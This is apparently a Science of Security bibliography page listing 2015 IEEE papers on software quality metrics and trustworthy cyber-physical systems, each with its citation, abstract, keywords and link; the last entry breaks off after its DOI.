Keywords: program debugging; program diagnostics; program testing; SATE V; bug finder evaluation; code complexity; ground truth; software static analysis; static analysis tool exposition V; static code analyzer measurement; static code analyzer testing; statistical significance; Complexity theory; Computer bugs; Java; Measurement; NIST; Production; Software; software assurance; software faults; software vulnerability; static analysis tools (ID#: 16-9411)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7181477&isnumber=7181467

 

C. Tantithamthavorn, S. McIntosh, A. E. Hassan, A. Ihara and K. Matsumoto, "The Impact of Mislabelling on the Performance and Interpretation of Defect Prediction Models," Software Engineering (ICSE), 2015 IEEE/ACM 37th IEEE International Conference on, Florence, 2015, pp. 812-823, 2015.

 doi: 10.1109/ICSE.2015.93

Abstract: The reliability of a prediction model depends on the quality of the data from which it was trained. Therefore, defect prediction models may be unreliable if they are trained using noisy data. Recent research suggests that randomly-injected noise that changes the classification (label) of software modules from defective to clean (and vice versa) can impact the performance of defect models. Yet, in reality, incorrectly labelled (i.e., mislabelled) issue reports are likely non-random. In this paper, we study whether mislabelling is random, and the impact that realistic mislabelling has on the performance and interpretation of defect models. Through a case study of 3,931 manually-curated issue reports from the Apache Jackrabbit and Lucene systems, we find that: (1) issue report mislabelling is not random; (2) precision is rarely impacted by mislabelled issue reports, suggesting that practitioners can rely on the accuracy of modules labelled as defective by models that are trained using noisy data; (3) however, models trained on noisy data typically achieve 56%-68% of the recall of models trained on clean data; and (4) only the metrics in top influence rank of our defect models are robust to the noise introduced by mislabelling, suggesting that the less influential metrics of models that are trained on noisy data should not be interpreted or used to make decisions.

Keywords: software performance evaluation; software reliability; Apache Jackrabbit system; Lucene system; defect prediction model interpretation; defect prediction model performance; defect prediction models; mislabelling impact; prediction model reliability; randomly-injected noise; software modules; Data mining; Data models; Noise; Noise measurement; Predictive models; Software; Data Quality; Mislabelling; Software Defect Prediction; Software Quality Assurance (ID#: 16-9412)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7194628&isnumber=7194545

 

Sun-Jan Huang, Wen-Chuan Chen and Ping-Yao Chiu, "Evaluation Process Model of the Software Product Quality Levels," Industrial Informatics - Computing Technology, Intelligent Technology, Industrial Information Integration (ICIICII), 2015 International Conference on, Wuhan, 2015, pp. 55-58, 2015. doi: 10.1109/ICIICII.2015.101

Abstract: Nowadays, software industry is still facing many problems in controlling and evaluating software product quality. One of the primary reasons for this is that except for the lack of an objective software product quality assessment model, software organizations do not have a well-defined mechanism for measuring the quality attributes and further evaluating the level of software product quality. This paper proposes a process model for evaluating the level of software product quality, which is based on the International Standard ISO/IEC 14598 - Software Product Evaluation. The proposed process model can generate a tailored software product quality evaluation model based on the types of information systems. Accordingly, the required software measures are collected and further analyzed for providing feedback to improve the software product quality. It can help software development organizations establish their own evaluation models of the software product quality level and thus serve as an agreement of the requirement of software product quality.

Keywords: quality control; software development management; software metrics; software quality; software standards; International Standard ISO/IEC 14598;evaluation process model; information system; objective software product quality assessment model; quality attribute measurement; quality control; quality evaluation; software development; software industry; software product quality level; IEC Standards; ISO Standards; Measurement; Organizations; Product design; Quality assessment; Software; Measurement and Analysis; Software Product Quality Level; Software Quality Assurance (ID#: 16-9413)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7373789&isnumber=7373746

 

Luyi Li, Minyan Lu and Tingyang Gu, "Constructing Runtime Models of Complex Software-Intensive Systems for Analysis of Failure Mechanism," Reliability Systems Engineering (ICRSE), 2015 First International Conference on, Beijing, 2015, pp. 1-10, 2015. doi: 10.1109/ICRSE.2015.7366482

Abstract: With the growing complexity of complex software-intensive systems, some new features emerge such as logical complexity, boundary erosion and failure normalization, which bring new challenges for software dependability assurance. As a result, there is urgent necessity to analyze the failure mechanism of these systems in order to ensure the dependability of complex software-intensive systems. Research indicates that because of the emerging new features, the failure mechanism of complex software-intensive systems is related closely to the system's runtime states and behaviors. But direct analysis of failure mechanism on actual complex software-intensive systems is costly and nearly impossible because of their large scale. So failure mechanism analysis was normally performed on abstract models of real systems. However, current modelling methods are insufficient for describing the system's internal interaction, software/hardware interaction behavior, runtime behavior comprehensively. So it is necessary to propose a new modelling method to support the description of these new features. This paper proposes a method for constructing runtime models for complex software-intensive systems which takes into consideration internal interaction behavior, interaction behavior between software and hardware on system boundary as well as dynamic runtime behavior. The proposed method includes a static structure model to describe the static structure property of the system, a software/hardware interaction model to describe the interaction characteristics between hardware and software on system boundary and a dynamic runtime behavior model to describe the dynamic features of runtime behavior formally. An example is provided to demonstrate how to use the proposed method and its implication for failure mechanism analysis in complex software-intensive systems is discussed.

Keywords: program diagnostics; software metrics software reliability; system recovery; abstract model; boundary erosion; complex software-intensive system; dynamic runtime behavior model; failure mechanism analysis; failure normalization; internal interaction behavior; logical complexity; runtime model; software dependability assurance; software-hardware interaction behavior; software-hardware interaction model; static structure model; system boundary; system internal interaction; system runtime behavior; system runtime state; Analytical models; Failure analysis; Object oriented modeling; Runtime; Software; Unified modeling language; dynamic runtime behavior; failure mechanism; interaction between software and hardware; runtime model; static structure (ID#: 16-9414)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7366482&isnumber=7366393

 

R. E. Garcia, R. C. Messias Correia, C. Olivete, A. Costacurta Brandi and J. Marques Prates, "Teaching and Learning Software Project Management: A Hands-on Approach," Frontiers in Education Conference (FIE), 2015. Doi: 32614 2015. IEEE, El Paso, TX, 2015, pp. 1-7, 2015. doi: 10.1109/FIE.2015.7344412

Abstract: Project management is an essential activity across several areas, including Software Engineering. Through good management it is possible to achieve deadlines, budgets goals and mainly delivering a product that meets customer expectations. Project management activity encompasses: measurement and metrics; estimation; risk analysis; schedules; tracking and control. Considering the importance of managing projects, it is necessary that courses related to Information Technology and Computer Science present to students concepts, techniques and methodology necessary to cover all project management activities. Software project management courses aim at preparing students to apply management techniques required to plan, organize, monitor and control software projects. In a nutshell, software project management focuses on process, problem and people. In this paper we proposed an approach to teaching and learning of software project management using practical activities. The intention of this work is to provide the experience of applying theoretical concepts in practical activities. The teaching and learning approach, applied since 2006 in a Computer Science course, is based on teamwork. Each team is divided into groups assuming different roles of software process development. We have set four groups, each one assuming a different role (manager; software quality assurance; analyst and designer; programmer). The team must be conducted across the software process by its manager. We use four projects, each group is in charge of managing a different project. In this paper we present the proposed approach (based on hands on activities for project management); we summarize the lessons learned by applying the approach since 2006; we present a qualitative analysis from data collect along the application.

Keywords: computer science education; educational courses; project management; risk analysis; scheduling; software management; software metrics; teaching; team working; analyst; computer science course; control; designer; estimation; hands-on approach; information technology; learning software project management course; manager; measurement; metrics; programmer; qualitative analysis; risk analysis; schedule; software engineering; software process development; software quality assurance; teaching; teamwork; tracking; Education; Monitoring; Project management; Schedules; Software; Software engineering; Learning Project Management; Practical Activities; Teaching Methodology; Teamwork (ID#: 16-9415)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7344412&isnumber=7344011

 

C. J. Hwang, A. Kush and Ruchika, "Performance Evaluation of MANET Using Quality of Service Metrics," Innovative Computing Technology (INTECH), 2015 Fifth International Conference on, Galcia, 2015, pp. 130-135, 2015. doi: 10.1109/INTECH.2015.7173483

Abstract: An ad hoc network is a collection of mobile nodes dynamically forming a temporary network without the use of any existing network infrastructure or centralized administration. Several routing protocols have been proposed for ad hoc networks and prominent among them are Ad hoc On Demand Distance Vector Routing (AODV) and Dynamic Source Routing (DSR). Effort has been made to merge software Quality assurance parameters to adhoc networks to achieve desired results. This Paper analyses the performance of AODV and DSR routing protocols for the quality assurance metrics. The performance differentials of AODV and DSR protocols are analyzed using NS-2 simulator and compared in terms of quality assurance metrics applied.

Keywords: mobile ad hoc networks; quality assurance; quality of service; routing protocols; software quality; AODV routing protocols; DSR routing protocols; MANET performance evaluation; NS-2 simulator; ad hoc on demand distance vector routing; dynamic source routing; mobile ad hoc network; mobile node collection; network infrastructure; quality of service metrics; software quality assurance parameter; temporary network; Mobile ad hoc networks; Reliability; Routing; Routing protocols; Usability; AODV; DSR; MANET; NS2; PDR; SQA (ID#: 16-9416)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7173483&isnumber=7173359

 

T. Bin Noor and H. Hemmati, "A Similarity-Based Approach for Test Case Prioritization Using Historical Failure Data," Software Reliability Engineering (ISSRE), 2015 IEEE 26th International Symposium on, Gaithersburg, MD, 2015, pp. 58-68. doi: 10.1109/ISSRE.2015.7381799

Abstract: Test case prioritization is a crucial element in software quality assurance in practice, specially, in the context of regression testing. Typically, test cases are prioritized in a way that they detect the potential faults earlier. The effectiveness of test cases, in terms of fault detection, is estimated using quality metrics, such as code coverage, size, and historical fault detection. Prior studies have shown that previously failing test cases are highly likely to fail again in the next releases, therefore, they are highly ranked, while prioritizing. However, in practice, a failing test case may not be exactly the same as a previously failed test case, but quite similar, e.g., when the new failing test is a slightly modified version of an old failing one to catch an undetected fault. In this paper, we define a class of metrics that estimate the test cases quality using their similarity to the previously failing test cases. We have conducted several experiments with five real world open source software systems, with real faults, to evaluate the effectiveness of these quality metrics. The results of our study show that our proposed similarity-based quality measure is significantly more effective for prioritizing test cases compared to existing test case quality measures.

Keywords: fault diagnosis; program testing; public domain software; quality assurance; regression analysis; software metrics; software quality; statistical testing; code coverage; code size; historical failure data; historical fault detection; open source software systems; regression testing; similarity-based quality measure; software quality assurance; software quality metrics; test case prioritization; Context; Fault detection; History; Measurement; Software quality; Testing; Code coverage; Distance function; Execution trace; Historical data; Similarity; Test case prioritization; Test quality metric; Test size (ID#: 16-9417)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7381799&isnumber=7381793

 

H. Sharma and A. Chug, "Dynamic Metrics Are Superior Than Static Metrics in Maintainability Prediction: An Empirical Case Study," Reliability, Infocom Technologies and Optimization (ICRITO) (Trends and Future Directions), 2015 4th International Conference on, Noida, 2015, pp. 1-6. doi: 10.1109/ICRITO.2015.7359354

Abstract: Software metrics help us to make meaningful estimates for software products and guide us in taking managerial and technical decisions like budget planning, cost estimation, quality assurance testing, software debugging, software performance optimization, and optimal personnel task assignments. Many design metrics have proposed in literature to measure various constructs of Object Oriented (OO) paradigm such as class, coupling, cohesion, inheritance, information hiding and polymorphism and use them further in determining the various aspects of software quality. However, the use of conventional static metrics have found to be inadequate for modern OO software due to the presence of run time polymorphism, templates class, template methods, dynamic binding and some code left unexecuted due to specific input conditions. This gap gave a cue to focus on the use of dynamic metrics instead of traditional static metrics to capture the software characteristics and further deploy them for maintainability predictions. As the dynamic metrics are more precise in capturing the execution behavior of the software system, in the current empirical investigation with the use of open source code, we validate and verify the superiority of dynamic metrics over static metrics. Four machine learning models are used for making the prediction model while training is performed simultaneously using static as well as dynamic metric suite. The results are analyzed using prevalent prediction accuracy measures which indicate that predictive capability of dynamic metrics is more concise than static metrics irrespective of any machine learning prediction model. Results of this would be helpful to practitioners as they can use the dynamic metrics in maintainability prediction in order to achieve precise planning of resource allocation.

Keywords: learning (artificial intelligence); object-oriented methods; public domain software; resource allocation; software maintenance; software metrics; software quality; OO software; design metrics; dynamic binding; dynamic metrics; machine learning prediction model; maintainability prediction; object oriented paradigm; open source code; prevalent prediction accuracy; resource allocation; run time polymorphism; software characteristics; software metrics; software product estimation; software quality; static metrics; template class; template methods; Dynamic metrics; Machine learning; Software maintainability prediction; Software quality; Static metrics (ID#: 16-9418)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7359354&isnumber=7359191

 

T. Cseri, "Examining Structural Correctness of Documentation Comments in C++ Programs," Scientific Conference on Informatics, 2015 IEEE 13th International, Poprad, 2015, pp. 79-84. doi: 10.1109/Informatics.2015.7377812

Abstract: Tools guaranteeing the correctness of software focus almost exclusively on the syntax and the semantics of programming languages. Compilers, static analysis tools, etc. generate diagnostic messages on inconsistencies of the language elements. However, source code contains other important artifacts: comments, which are highly important to document, understand and therefore maintain the software. It is a common experience that the quality of comments erodes during the lifecycle of the software. In this paper we investigate the quality of the documentation comments, which follow a predefined strict syntax, because they are written to be processed using an external documentation generator tool. We categorize the inconsistencies identified by Doxygen - the most widespread documentation tool for C++. We define a metric to represent the quality of the comments and we investigate how this metric changes during the lifetime of a project. The aim of the research is to provide quality assurance for the non-language components of the software.

Keywords: C++ language; computational linguistics; software metrics; software quality; system documentation; C++ programs; Doxygen; comments quality metric; documentation comments quality; documentation comments structural correctness; external documentation generator tool; quality assurance; software nonlanguage components; syntax; Documentation; Generators; HTML; Semantics; Software; Syntactics (ID#: 16-9419)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7377812&isnumber=7377797

 

N. Ohsugi et al., "Using Trac for Empirical Data Collection and Analysis in Developing Small and Medium-Sized Enterprise Systems," Empirical Software Engineering and Measurement (ESEM), 2015 ACM/IEEE International Symposium on, Beijing, 2015, pp. 1-9. doi: 10.1109/ESEM.2015.7321217

Abstract: This paper describes practical case studies of using Trac as a platform for collecting empirical data in the development of small and medium-sized enterprise systems. Project managers have been using various empirical data such as size, development efforts and number of bugs found. These data are vital for management, although the cost entailed is not small in preparing an effective combination of measurement tools, procedures and continuous monitoring to collect reliable data, and many small and medium-sized projects are constrained by budget limitations. This paper describes practical examples of data collection at low cost in the development of two enterprise systems. The examples consist of a small project (5 development personnel at the peak period, down to 3 during the maintenance) and a medium-sized project (80 personnel at the peak, down to 28), used to develop two different enterprise systems. Over 29 months, ten basic metrics and seven derived metrics were collected regarding effort, size and quality, and were used for progress management, estimation, and quality assurance.

Keywords: data analysis; small-to-medium enterprises; Trac; data analysis; empirical data collection; progress management; small and medium-sized enterprise systems; Data collection; Estimation; Maintenance engineering; Measurement; Monitoring; Personnel; Reliability (ID#: 16-9420)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7321217&isnumber=7321177

 

R. Yanggratoke et al., "Predicting Real-Time Service-Level Metrics From Device Statistics," Integrated Network Management (IM), 2015 IFIP/IEEE International Symposium on, Ottawa, ON, 2015, pp. 414-422. doi: 10.1109/INM.2015.7140318

Abstract: While real-time service assurance is critical for emerging telecom cloud services, understanding and predicting performance metrics for such services is hard. In this paper, we pursue an approach based upon statistical learning whereby the behavior of the target system is learned from observations. We use methods that learn from device statistics and predict metrics for services running on these devices. Specifically, we collect statistics from a Linux kernel of a server machine and predict client-side metrics for a video-streaming service (VLC). The fact that we collect thousands of kernel variables, while omitting service instrumentation, makes our approach service-independent and unique. While our current lab configuration is simple, our results, gained through extensive experimentation, prove the feasibility of accurately predicting client-side metrics, such as video frame rates and RTP packet rates, often within 10-15% error (NMAE), also under high computational load and across traces from different scenarios.

Keywords: Linux; cloud computing; operating system kernels; software performance evaluation; video streaming; Linux kernel; VLC; client-side metrics prediction; device statistics; performance metrics; real-time service assurance; real-time service-level metrics prediction; server machine; service instrumentation; statistical learning; telecom cloud services; video-streaming service; Computational modeling; Generators; Load modeling; Measurement; Predictive models; Servers; Streaming media; Quality of service; cloud computing; machine learning; network analytics; statistical learning; video streaming (ID#: 16-9421)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7140318&isnumber=7140257

 

W. C. Barott, T. Dabrowski and B. Himed, "Fidelity and Complexity in Passive Radar Simulations," High Assurance Systems Engineering (HASE), 2015 IEEE 16th International Symposium on, Daytona Beach Shores, FL, 2015, pp. 277-278. doi: 10.1109/HASE.2015.30

Abstract: A case study of the trade off between fidelity and complexity is presented for a passive radar simulator. Although it is possible to accurately model the underlying physics, signal processing, and environment of a radar, the resulting model might be both too complex and too costly to evaluate. Instead, simplifications of various model attributes reduce the complexity and permit fast evaluation of performance metrics over large areas, such as the United States. Several model simplifications and their impact on the results are discussed.

Keywords: digital simulation; passive radar; radar computing; United States; complexity; complexity reduction; fidelity; passive radar simulations; radar environment; signal processing; Accuracy; Atmospheric modeling; Computational modeling; Passive radar; Predictive models; modeling; passive radar; simulation (ID#: 16-9422)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7027444&isnumber=7027398

 

E. Takamura, K. Mangum, F. Wasiak and C. Gomez-Rosa, "Information Security Considerations for Protecting NASA Mission Operations Centers (MOCs)," Aerospace Conference, 2015 IEEE, Big Sky, MT, 2015, pp. 1-14. doi: 10.1109/AERO.2015.7119207

Abstract: In NASA space flight missions, the Mission Operations Center (MOC) is often considered “the center of the (ground segment) universe,” at least by those involved with ground system operations. It is at and through the MOC that spacecraft is commanded and controlled, and science data acquired. This critical element of the ground system must be protected to ensure the confidentiality, integrity and availability of the information and information systems supporting mission operations. This paper identifies and highlights key information security aspects affecting MOCs that should be taken into consideration when reviewing and/or implementing protecting measures in and around MOCs. It stresses the need for compliance with information security regulation and mandates, and the need for the reduction of IT security risks that can potentially have a negative impact to the mission if not addressed. This compilation of key security aspects was derived from numerous observations, findings, and issues discovered by IT security audits the authors have conducted on NASA mission operations centers in the past few years. It is not a recipe on how to secure MOCs, but rather an insight into key areas that must be secured to strengthen the MOC, and enable mission assurance. Most concepts and recommendations in the paper can be applied to non-NASA organizations as well. Finally, the paper emphasizes the importance of integrating information security into the MOC development life cycle as configuration, risk and other management processes are tailored to support the delicate environment in which mission operations take place.

Keywords: aerospace computing; command and control systems; data integrity; information systems; risk management; security of data; space vehicles; IT security audits; IT security risk reduction; MOC development life cycle; NASA MOC protection; NASA mission operation center protection; NASA space flight missions; ground system operations; information availability; information confidentiality; information integrity; information security considerations; information security regulation; information systems; nonNASA organizations; spacecraft command and control; Access control; Information security; Monitoring; NASA; Software; IT security metrics; NASA; access control; asset protection; automation; change control; connection protection; continuous diagnostics and mitigation; continuous monitoring; ground segment ground system; incident handling; information assurance; information security; information security leadership; information technology leadership; infrastructure protection; least privilege; logical security; mission assurance; mission operations; mission operations center; network security; personnel screening; physical security; policies and procedures; risk management; scheduling restrictions; security controls; security hardening; software updates; system cloning and software licenses; system security; system security life cycle; unauthorized change detection; unauthorized change deterrence; unauthorized change prevention (ID#: 16-9423)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7119207&isnumber=7118873

 

J. D. Rocco, D. D. Ruscio, L. Iovino and A. Pierantonio, "Mining Correlations of ATL Model Transformation and Metamodel Metrics," Modeling in Software Engineering (MiSE), 2015 IEEE/ACM 7th International Workshop on, Florence, 2015, pp. 54-59. doi: 10.1109/MiSE.2015.17

Abstract: Model transformations are considered to be the "heart" and "soul" of Model Driven Engineering, and as a such, advanced techniques and tools are needed for supporting the development, quality assurance, maintenance, and evolution of model transformations. Even though model transformation developers are gaining the availability of powerful languages and tools for developing, and testing model transformations, very few techniques are available to support the understanding of transformation characteristics. In this paper, we propose a process to analyze model transformations with the aim of identifying to what extent their characteristics depend on the corresponding input and target met models. The process relies on a number of transformation and metamodel metrics that are calculated and properly correlated. The paper discusses the application of the approach on a corpus consisting of more than 90 ATL transformations and 70 corresponding metamodels.

Keywords: program diagnostics; software metrics; ATL model transformation; correlation modeling; metamodel metrics; model driven engineering; Analytical models; Complexity theory; Correlation; IP networks; Indexes; Measurement; Object oriented modeling (ID#: 16-9424)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7167403&isnumber=7167386

 

Y. S. Olaperi and S. Misra, "An Empirical Evaluation of Software Quality Assurance Practices and Challenges in a Developing Country," Computer and Information Technology; Ubiquitous Computing and Communications; Dependable, Autonomic and Secure Computing; Pervasive Intelligence and Computing (CIT/IUCC/DASC/PICOM), 2015 IEEE International Conference on, Liverpool, 2015, pp. 867-871. doi: 10.1109/CIT/IUCC/DASC/PICOM.2015.129

Abstract: Globally, it has been ascertained that the implementation of software quality assurance practices throughout the software development cycle yields quality software products that satisfies the user and meets specified requirements. The awareness and adoption of these techniques has recorded increase in the quality and patronage of software products. However, in developing countries like Nigeria indigenous software produced is not patronized by large corporations such as banks for their financial portfolio, and even the government. This research investigated the software quality assurance practices of practitioners in Nigeria, and the challenges being faced in implementing software quality in a bid to improve the quality and patronage of software. It was observed that while most practitioners claim to adhere to software quality practices, they barely have an understanding of software quality standards and a vast majority do not have a distinct software quality assurance team to enforce this quality. The core challenges inhibiting the practice of these software quality standards have also been identified. The research has helped to reveal some issues within the industry, of which possible solutions have been proffered.

Keywords: human factors; quality assurance; software development management; software process improvement; software quality; software standards; Nigeria; developing countries; software development cycle; software quality assurance practices; software quality assurance team; software quality improvement; user satisfaction; Companies; Planning; Software quality; Standards organizations; software; software quality; software quality assurance; software quality challenges (ID#: 16-9425)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7363169&isnumber=7362962

 

J. Morris-King and H. Cam, "Ecology-Inspired Cyber Risk Model for Propagation of Vulnerability Exploitation in Tactical Edge," Military Communications Conference, MILCOM 2015 - 2015 IEEE, Tampa, FL, 2015, pp. 336-341. doi: 10.1109/MILCOM.2015.7357465

Abstract: A multitude of cyber vulnerabilities on the tactical edge arise from the mix of network infrastructure, physical hardware and software, and individual user-behavior. Because of the inherent complexity of socio-technical systems, most models of tactical cyber assurance omit the non-physical influence propagation between mobile systems and users. This omission leads to a question: how can the flow of influence across a network act as a proxy for assessing the propagation of risk? Our contribution toward solving this problem is to introduce a dynamic, adaptive ecosystem-inspired model of vulnerability exploitation and risk flow over a tactical network. This model is based on ecological characteristics of the tactical edge, where the heterogeneous characteristics and behaviors of human-machine systems enhance or degrade mission risk in the tactical environment. Our approach provides an in-depth analysis of vulnerability exploitation propagation and risk flow using a multi-agent epidemic model which incorporates user-behavior and mobility as components of the system. This user-behavior component is expressed as a time-varying parameter driving a multi-agent system. We validate this model by conducting a synthetic battlefield simulation, where performance results depend mainly on the level of functionality of the assets and services. The composite risk score is shown to be proportional to infection rates from the Standard Epidemic Model.

Keywords: human factors; military communication; mobile ad hoc networks; multi-agent systems; telecommunication computing; telecommunication network reliability; time-varying systems; dynamic adaptive ecosystem-inspired model; ecology-inspired cyber risk model; human-machine systems; mobile systems; mobile users; multiagent epidemic model; nonphysical influence propagation; risk flow; risk propagation; socio-technical system complexity; synthetic battlefield simulation; tactical cyber assurance; tactical edge; tactical network; time-varying parameter; user-behavior; vulnerability exploitation propagation; Biological system modeling; Computational modeling; Computer security; Ecosystems; Risk management; Timing; Unified modeling language; Agent-based simulation; Ecological modeling; Epidemic system; Risk propagation; Tactical edge network (ID#: 16-9426)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7357465&isnumber=7357245


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.

Trustworthy Systems 2015

 

 
SoS Logo

Trustworthy Systems 2015

 

Trust is created in information security to assure the identity of external parties.  Trustworthy systems are a key element in the security of cyber physical systems, resiliency, and composability.  The research cited here was presented in 2015.


H. Orojloo and M. A. Azgomi, "Evaluating The Complexity And Impacts Of Attacks on Cyber-Physical Systems," Real-Time and Embedded Systems and Technologies (RTEST), 2015 CSI Symposium on, Tehran, 2015, pp. 1-8. doi: 10.1109/RTEST.2015.7369840

Abstract: In this paper, a new method for quantitative evaluation of the security of cyber-physical systems (CPSs) is proposed. The proposed method models the different classes of adversarial attacks against CPSs, including cross-domain attacks, i.e., cyber-to-cyber and cyber-to-physical attacks. It also takes the secondary consequences of attacks on CPSs into consideration. The intrusion process of attackers has been modeled using attack graph and the consequence estimation process of the attack has been investigated using process model. The security attributes and the special parameters involved in the security analysis of CPSs, have been identified and considered. The quantitative evaluation has been done using the probability of attacks, time-to-shutdown of the system and security risks. The validation phase of the proposed model is performed as a case study by applying it to a boiling water power plant and estimating the suitable security measures.

Keywords: cyber-physical systems; estimation theory; graph theory; probability; security of data; CPS; attack graph; attack probability; consequence estimation process; cross-domain attack; cyber-physical system security;cyber-to-cyber attack; cyber-to-physical attack; security attributes; security risks; time-to-shutdown; Actuators; Computer crime; Cyber-physical systems; Process control; Sensor phenomena and characterization; Cyber-physical systems; attack consequences; modeling; quantitative security evaluation (ID#: 16-9427)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7369840&isnumber=7369836

 

K. G. Lyn, L. W. Lerner, C. J. McCarty and C. D. Patterson, "The Trustworthy Autonomic Interface Guardian Architecture for Cyber-Physical Systems," Computer and Information Technology; Ubiquitous Computing and Communications; Dependable, Autonomic and Secure Computing; Pervasive Intelligence and Computing (CIT/IUCC/DASC/PICOM), 2015 IEEE International Conference on, Liverpool, 2015, pp. 1803-1810. doi: 10.1109/CIT/IUCC/DASC/PICOM.2015.263

Abstract: The growing connectivity of cyber-physical systems (CPSes) has led to an increased concern over the ability of cyber-attacks to inflict physical damage. Current cyber-security measures focus on preventing attacks from penetrating control supervisory networks. These reactive techniques, however, are often plagued with vulnerabilities and zero-day exploits. Embedded processors in CPS field devices often possess little security of their own, and are easily exploited once the network is penetrated. We identify four possible outcomes of a cyber-attack on a CPS embedded processor. We then discuss five trust requirements that a device must satisfy to guarantee correct behavior through the device's lifecycle. Next, we examine the Trustworthy Autonomic Interface Guardian Architecture (TAIGA) which monitors communication between the embedded controller and physical process. This autonomic architecture provides the physical process with a last line of defense against cyber-attacks. TAIGA switches process control to a trusted backup controller if an attack causes a system specification violation. We conclude with experimental results of an implementation of TAIGA on a hazardous cargo-carrying robot.

Keywords: cyber-physical systems; trusted computing; CPS embedded processor; TAIGA; cyber-attacks; cyber-physical systems; cyber-security measures; embedded controller; physical process; reactive techniques; trusted backup controller; trustworthy autonomic interface guardian architecture; Control systems; Process control; Program processors; Sensors; Trojan horses; Cyber-physical systems; autonomic control; embedded device security; resilience; trust (ID#: 16-9428)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7363316&isnumber=7362962

 

Xiaohong Chen, Fan Gu, Mingsong Chen, Dehui Du, Jing Liu and Haiying Sun, "Evaluating Energy Consumption for Cyber-Physical Energy System: An Environment Ontology-Based Approach," Computer Software and Applications Conference (COMPSAC), 2015 IEEE 39th Annual, Taichung, 2015, pp. 5-14. doi: 10.1109/COMPSAC.2015.114

Abstract: Energy consumption evaluation is one of the most important steps in Cyber-Physical Energy System (CPES) development. However, due to the lack of accurate and effective modeling and evaluation approaches considering the uncertainty of environment, it is hard to conduct the quantitative analysis for the energy consumption of CPESs. To address the above issue, this paper proposes an environment-aware energy consumption evaluation framework based on the Statistical Model Checking (SMC). In our framework, the environment uncertainty of CPESs is modeled using the Stochastic Hybrid Automata (SHA). In order to describe various environment modeling patterns, we create a collection of parameterized SHA models and save them to a domain specific environment ontology. Based on the domain environment ontology and user designs in the form of UML sequence diagrams and activity diagrams, our framework can automatically guide the construction of CPES models using networks of SHA and conduct the corresponding energy consumption evaluation. A case study based on an energy-aware building design demonstrates that our approach can not only support the accurate environment modeling with various uncertain factors, but also can be used to reason the relations between the energy consumption and environment uncertainties of CPES designs.

Keywords: energy consumption; power system management; power system security; statistical analysis; stochastic automata; CPES development; SMC; UML sequence diagram; cyber physical energy system; energy aware building design; energy consumption evaluation; environment ontology based approach; environment uncertainty; environment-aware energy consumption; parameterized SHA models; statistical model checking; stochastic hybrid automata; Energy consumption; Monitoring; Ontologies; Synchronization; Temperature measurement; Uncertainty; Unified modeling language; Cyber-Physical Energy Systems; Environment Ontology; Statistical Model Checking; Stochastic Hybrid Automata (SHA); Uncertainty of Environment (ID#: 16-9429)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7273590&isnumber=7273573

 

Bei Cheng, Xiao Wang, Jufu Liu and Dehui Du, "Modana: An Integrated Framework for Modeling and Analysis of Energy-Aware CPSs," Computer Software and Applications Conference (COMPSAC), 2015 IEEE 39th Annual, Taichung, 2015, pp. 127-136. doi: 10.1109/COMPSAC.2015.68

Abstract: Cyber-Physical Systems (CPSs) as advanced embedded systems integrating computation with physical process are increasingly penetrating into our life. Modeling and analysis for such systems closely involved with us are actively researched. A current challenging problem is how to take advantages of existing technologies like SysML/MARTE, Modelica and Statistical Model Checking (SMC) through effective integration. Moreover, the lack of efficient methodologies or tools for modeling and analysis of CPSs makes the gap between design and analysis models hard to bridge. To solve these problems, we present a framework named Modana to achieve an integrated process from modeling with SysML/MARTE to analysis with SMC for CPSs in terms of Non Functional Properties (NFP) such as time, energy, etc. Functional Mock-up Interface (FMI), as a connecting link between modeling and analysis, plays a major role in coordinating various tools for co-simulation to generate traces as the input of statistical model checker. To demonstrate the capability of Modana framework, we model energy-aware buildings as a case study, and discuss the analysis on energy consumption in different scenarios.

Keywords: embedded systems; formal verification; power aware computing; statistical analysis; FMI; Modana; Modelica; NFP; SMC; SysML/MARTE; cyber-physical systems; embedded systems; energy consumption; energy-aware CPS analysis; energy-aware CPS modeling; energy-aware buildings; functional mock-up interface; integrated framework; integrated process; nonfunctional properties; statistical model checking; system analysis; system modeling; Analytical models; Computational modeling; Libraries; Mathematical model; Object oriented modeling; Stochastic processes; Unified modeling language; SysML/MARTE; cyber-physical systems; energy-aware buildings; functional mock-up interface; statistical model checking (ID#: 16-9430)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7273610&isnumber=7273573

 

Tai-Won Um, Gyu Myoung Lee and Jun Kyun Choi, "Strengthening Trust in the Future ICT Infrastructure," ITU Kaleidoscope: Trust in the Information Society (K-2015), 2015, Barcelona, 2015, pp. 1-8.  doi: 10.1109/Kaleidoscope.2015.7383628

